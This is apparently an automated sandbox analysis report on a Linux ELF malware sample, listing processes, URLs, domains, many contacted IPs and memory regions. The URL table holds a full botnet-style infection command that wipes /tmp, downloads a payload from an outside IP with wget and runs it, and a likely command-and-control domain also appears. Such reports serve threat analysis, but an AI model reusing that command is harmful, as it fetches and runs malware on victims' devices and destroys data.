Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/db0fa4b8db0333367e9bda3ab68b8042.sh4.elf
|
/tmp/db0fa4b8db0333367e9bda3ab68b8042.sh4.elf
|
||
|
/tmp/db0fa4b8db0333367e9bda3ab68b8042.sh4.elf
|
-
|
||
|
/tmp/db0fa4b8db0333367e9bda3ab68b8042.sh4.elf
|
-
|
||
|
/tmp/db0fa4b8db0333367e9bda3ab68b8042.sh4.elf
|
-
|
||
|
/tmp/db0fa4b8db0333367e9bda3ab68b8042.sh4.elf
|
-
|
||
|
/tmp/db0fa4b8db0333367e9bda3ab68b8042.sh4.elf
|
-
|
||
|
/tmp/db0fa4b8db0333367e9bda3ab68b8042.sh4.elf
|
-
|
||
|
/tmp/db0fa4b8db0333367e9bda3ab68b8042.sh4.elf
|
-
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray
"Notification Area" "Area where notification icons appear"
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921
statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8
12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9
12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness
of your display"
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
-
|
||
|
/usr/sbin/xfpm-power-backlight-helper
|
/usr/sbin/xfpm-power-backlight-helper --get-max-brightness
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so
10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925
actions "Action Buttons" "Log out, lock or other system actions"
|
||
|
/usr/bin/dbus-daemon
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
|
/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd
|
/usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd
|
There are 16 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+212.227.63.113/jaws;sh+/tmp/jaws
|
181.200.188.126
|
 |
|
|
http://212.227.63.113/bin
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/envelope/
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
plutoc2.site
|
212.227.63.113
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
41.79.71.202
|
unknown
|
Tanzania United Republic of
|
|
|
|
41.111.251.121
|
unknown
|
Algeria
|
|
|
|
156.26.154.174
|
unknown
|
United States
|
|
|
|
156.167.162.207
|
unknown
|
Egypt
|
|
|
|
51.97.11.221
|
unknown
|
United States
|
||
|
192.172.247.137
|
unknown
|
United States
|
||
|
25.224.41.104
|
unknown
|
United Kingdom
|
||
|
41.17.43.217
|
unknown
|
South Africa
|
||
|
69.218.34.161
|
unknown
|
United States
|
||
|
69.104.195.8
|
unknown
|
United States
|
||
|
207.161.79.66
|
unknown
|
Canada
|
||
|
123.35.115.236
|
unknown
|
Korea Republic of
|
||
|
125.243.127.174
|
unknown
|
Korea Republic of
|
||
|
196.195.218.209
|
unknown
|
South Africa
|
||
|
197.64.127.213
|
unknown
|
South Africa
|
||
|
123.10.221.8
|
unknown
|
China
|
||
|
220.167.228.218
|
unknown
|
China
|
||
|
221.85.80.49
|
unknown
|
Japan
|
||
|
118.70.240.230
|
unknown
|
Viet Nam
|
||
|
8.33.71.13
|
unknown
|
United States
|
||
|
197.173.167.37
|
unknown
|
South Africa
|
||
|
149.140.33.158
|
unknown
|
Turkey
|
||
|
141.217.120.198
|
unknown
|
United States
|
||
|
2.252.251.38
|
unknown
|
Sweden
|
||
|
197.204.24.2
|
unknown
|
Algeria
|
||
|
156.97.124.188
|
unknown
|
Chile
|
||
|
156.222.166.19
|
unknown
|
Egypt
|
||
|
118.21.171.232
|
unknown
|
Japan
|
||
|
212.48.96.197
|
unknown
|
Germany
|
||
|
49.235.142.203
|
unknown
|
China
|
||
|
212.157.107.247
|
unknown
|
France
|
||
|
197.105.84.64
|
unknown
|
South Africa
|
||
|
138.153.39.121
|
unknown
|
United States
|
||
|
91.174.212.151
|
unknown
|
France
|
||
|
158.90.93.94
|
unknown
|
Finland
|
||
|
197.148.82.164
|
unknown
|
Nigeria
|
||
|
5.115.148.30
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
|
170.46.175.252
|
unknown
|
United States
|
||
|
41.217.224.145
|
unknown
|
Egypt
|
||
|
41.131.19.192
|
unknown
|
Egypt
|
||
|
37.53.10.72
|
unknown
|
Ukraine
|
||
|
84.170.212.31
|
unknown
|
Germany
|
||
|
58.158.28.187
|
unknown
|
Japan
|
||
|
94.83.243.229
|
unknown
|
Italy
|
||
|
37.81.32.101
|
unknown
|
Germany
|
||
|
68.207.110.130
|
unknown
|
United States
|
||
|
54.126.82.77
|
unknown
|
United States
|
||
|
1.148.224.83
|
unknown
|
Australia
|
||
|
156.21.157.150
|
unknown
|
United States
|
||
|
41.58.66.80
|
unknown
|
Nigeria
|
||
|
41.66.181.96
|
unknown
|
South Africa
|
||
|
100.207.159.50
|
unknown
|
United States
|
||
|
137.99.108.96
|
unknown
|
United States
|
||
|
210.195.54.76
|
unknown
|
Malaysia
|
||
|
103.177.151.232
|
unknown
|
unknown
|
||
|
156.46.245.108
|
unknown
|
United States
|
||
|
145.63.134.180
|
unknown
|
Netherlands
|
||
|
139.174.157.139
|
unknown
|
Germany
|
||
|
178.187.98.80
|
unknown
|
Russian Federation
|
||
|
63.223.72.200
|
unknown
|
United States
|
||
|
63.122.162.142
|
unknown
|
United States
|
||
|
123.79.149.210
|
unknown
|
China
|
||
|
204.25.188.248
|
unknown
|
United States
|
||
|
200.58.107.237
|
unknown
|
Argentina
|
||
|
37.196.126.173
|
unknown
|
Sweden
|
||
|
41.9.43.163
|
unknown
|
South Africa
|
||
|
197.71.234.183
|
unknown
|
South Africa
|
||
|
137.243.232.152
|
unknown
|
United States
|
||
|
197.154.61.115
|
unknown
|
Ethiopia
|
||
|
117.50.135.247
|
unknown
|
China
|
||
|
94.182.8.12
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
|
2.51.78.60
|
unknown
|
United Arab Emirates
|
||
|
4.92.84.178
|
unknown
|
United States
|
||
|
41.97.63.174
|
unknown
|
Algeria
|
||
|
204.23.248.80
|
unknown
|
United States
|
||
|
171.103.158.89
|
unknown
|
Thailand
|
||
|
94.46.181.108
|
unknown
|
Portugal
|
||
|
95.170.64.27
|
unknown
|
Netherlands
|
||
|
192.161.55.174
|
unknown
|
United States
|
||
|
123.234.204.127
|
unknown
|
China
|
||
|
211.71.141.171
|
unknown
|
China
|
||
|
187.55.7.194
|
unknown
|
Brazil
|
||
|
178.148.131.129
|
unknown
|
Serbia
|
||
|
41.114.230.15
|
unknown
|
South Africa
|
||
|
41.87.174.49
|
unknown
|
Botswana
|
||
|
137.193.243.194
|
unknown
|
Germany
|
||
|
42.108.232.78
|
unknown
|
India
|
||
|
197.190.200.243
|
unknown
|
Ghana
|
||
|
205.99.84.136
|
unknown
|
United States
|
||
|
172.178.105.195
|
unknown
|
United States
|
||
|
220.68.223.150
|
unknown
|
Korea Republic of
|
||
|
117.135.228.168
|
unknown
|
China
|
||
|
41.119.126.172
|
unknown
|
South Africa
|
||
|
5.188.4.180
|
unknown
|
United States
|
||
|
44.11.82.209
|
unknown
|
United States
|
||
|
156.113.236.127
|
unknown
|
United States
|
||
|
92.180.84.119
|
unknown
|
France
|
||
|
156.126.230.138
|
unknown
|
United States
|
||
|
41.83.58.79
|
unknown
|
Senegal
|
||
|
200.2.221.75
|
unknown
|
Chile
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7feed0413000
|
page execute read
|
|
||
|
7feed0413000
|
page execute read
|
|
||
|
7feed0413000
|
page execute read
|
|
||
|
7feed0413000
|
page execute read
|
|
||
|
7feed0413000
|
page execute read
|
|
||
|
7feed0413000
|
page execute read
|
|
||
|
7fef56064000
|
page read and write
|
|||
|
563763cdd000
|
page read and write
|
|||
|
7feed0424000
|
page read and write
|
|||
|
7fef5557a000
|
page read and write
|
|||
|
7fef56064000
|
page read and write
|
|||
|
7fef5556c000
|
page read and write
|
|||
|
7feed0424000
|
page read and write
|
|||
|
563760867000
|
page read and write
|
|||
|
7feed0424000
|
page read and write
|
|||
|
7fef55809000
|
page read and write
|
|||
|
563763cdd000
|
page read and write
|
|||
|
7fef54d69000
|
page read and write
|
|||
|
7fef55809000
|
page read and write
|
|||
|
7fef50021000
|
page read and write
|
|||
|
56376287c000
|
page read and write
|
|||
|
7fef560b1000
|
page read and write
|
|||
|
7fef56064000
|
page read and write
|
|||
|
7fef5557a000
|
page read and write
|
|||
|
7fef50021000
|
page read and write
|
|||
|
7feed06db000
|
page read and write
|
|||
|
7feed0423000
|
page read and write
|
|||
|
7fef55f3b000
|
page read and write
|
|||
|
7fef55809000
|
page read and write
|
|||
|
7fef50000000
|
page read and write
|
|||
|
563763cdd000
|
page read and write
|
|||
|
7fef5557a000
|
page read and write
|
|||
|
7ffea8eed000
|
page execute read
|
|||
|
56376287c000
|
page read and write
|
|||
|
563760649000
|
page execute read
|
|||
|
7fef55bf0000
|
page read and write
|
|||
|
7fef55f3b000
|
page read and write
|
|||
|
7fef55809000
|
page read and write
|
|||
|
7fef55bcb000
|
page read and write
|
|||
|
7fef50021000
|
page read and write
|
|||
|
7fef55bf0000
|
page read and write
|
|||
|
563762865000
|
page execute and read and write
|
|||
|
7fef5557a000
|
page read and write
|
|||
|
7fef55bcb000
|
page read and write
|
|||
|
563760649000
|
page execute read
|
|||
|
56376287c000
|
page read and write
|
|||
|
7fef54d69000
|
page read and write
|
|||
|
7fef5606c000
|
page read and write
|
|||
|
563760867000
|
page read and write
|
|||
|
7fef56064000
|
page read and write
|
|||
|
7fef50000000
|
page read and write
|
|||
|
563762865000
|
page execute and read and write
|
|||
|
563762865000
|
page execute and read and write
|
|||
|
563760649000
|
page execute read
|
|||
|
563762865000
|
page execute and read and write
|
|||
|
56376287c000
|
page read and write
|
|||
|
56376085f000
|
page read and write
|
|||
|
56376085f000
|
page read and write
|
|||
|
7feed0423000
|
page read and write
|
|||
|
7fef55bf0000
|
page read and write
|
|||
|
7fef56064000
|
page read and write
|
|||
|
563762865000
|
page execute and read and write
|
|||
|
7fef5556c000
|
page read and write
|
|||
|
7ffea8e6e000
|
page read and write
|
|||
|
7fef54d69000
|
page read and write
|
|||
|
7fef560b1000
|
page read and write
|
|||
|
7feed0424000
|
page read and write
|
|||
|
7fef5556c000
|
page read and write
|
|||
|
7fef5556c000
|
page read and write
|
|||
|
7feed0423000
|
page read and write
|
|||
|
7fef50021000
|
page read and write
|
|||
|
7fef560b1000
|
page read and write
|
|||
|
7fef54d69000
|
page read and write
|
|||
|
56376287c000
|
page read and write
|
|||
|
7fef50000000
|
page read and write
|
|||
|
7fef55bf0000
|
page read and write
|
|||
|
56376085f000
|
page read and write
|
|||
|
563763cbc000
|
page read and write
|
|||
|
7fef5606c000
|
page read and write
|
|||
|
7fef50021000
|
page read and write
|
|||
|
563760867000
|
page read and write
|
|||
|
7ffea8eed000
|
page execute read
|
|||
|
56376085f000
|
page read and write
|
|||
|
7ffea8eed000
|
page execute read
|
|||
|
56376085f000
|
page read and write
|
|||
|
7feed0424000
|
page read and write
|
|||
|
7ffea8e6e000
|
page read and write
|
|||
|
563763cdd000
|
page read and write
|
|||
|
563760649000
|
page execute read
|
|||
|
563763cbc000
|
page read and write
|
|||
|
7fef560b1000
|
page read and write
|
|||
|
7fef55bcb000
|
page read and write
|
|||
|
7fef5557a000
|
page read and write
|
|||
|
563760867000
|
page read and write
|
|||
|
563763cdd000
|
page read and write
|
|||
|
7fef55809000
|
page read and write
|
|||
|
563760649000
|
page execute read
|
|||
|
7ffea8eed000
|
page execute read
|
|||
|
7fef55bcb000
|
page read and write
|
|||
|
563760649000
|
page execute read
|
|||
|
7feed0476000
|
page read and write
|
|||
|
563763cbc000
|
page read and write
|
|||
|
7fef55bcb000
|
page read and write
|
|||
|
7fef560b1000
|
page read and write
|
|||
|
563763cbc000
|
page read and write
|
|||
|
7ffea8e6e000
|
page read and write
|
|||
|
7fef50000000
|
page read and write
|
|||
|
7ffea8e6e000
|
page read and write
|
|||
|
7fef560b1000
|
page read and write
|
|||
|
7fef55bcb000
|
page read and write
|
|||
|
7fef55809000
|
page read and write
|
|||
|
563763cbc000
|
page read and write
|
|||
|
563760867000
|
page read and write
|
|||
|
7ffea8eed000
|
page execute read
|
|||
|
7feed042f000
|
page read and write
|
|||
|
7fef5556c000
|
page read and write
|
|||
|
56376287c000
|
page read and write
|
|||
|
7fef55f3b000
|
page read and write
|
|||
|
7feed0476000
|
page read and write
|
|||
|
7fef55f3b000
|
page read and write
|
|||
|
7fef5606c000
|
page read and write
|
|||
|
7fef5557a000
|
page read and write
|
|||
|
7fef50000000
|
page read and write
|
|||
|
7fef54d69000
|
page read and write
|
|||
|
7fef5606c000
|
page read and write
|
|||
|
7feed0423000
|
page read and write
|
|||
|
7fef5606c000
|
page read and write
|
|||
|
7feed0423000
|
page read and write
|
|||
|
7fef55bf0000
|
page read and write
|
|||
|
7fef50000000
|
page read and write
|
|||
|
7fef50021000
|
page read and write
|
|||
|
7fef55bf0000
|
page read and write
|
|||
|
7fef55f3b000
|
page read and write
|
|||
|
7ffea8e6e000
|
page read and write
|
|||
|
7ffea8e6e000
|
page read and write
|
|||
|
563760867000
|
page read and write
|
|||
|
7fef5556c000
|
page read and write
|
|||
|
7fef55f3b000
|
page read and write
|
|||
|
7feed0424000
|
page read and write
|
|||
|
7ffea8eed000
|
page execute read
|
|||
|
7fef56064000
|
page read and write
|
|||
|
7feed0423000
|
page read and write
|
|||
|
7fef54d69000
|
page read and write
|
|||
|
7fef5606c000
|
page read and write
|
|||
|
563762865000
|
page execute and read and write
|
|||
|
56376085f000
|
page read and write
|
|||
|
563763cbc000
|
page read and write
|
There are 137 hidden memdumps, click here to show them.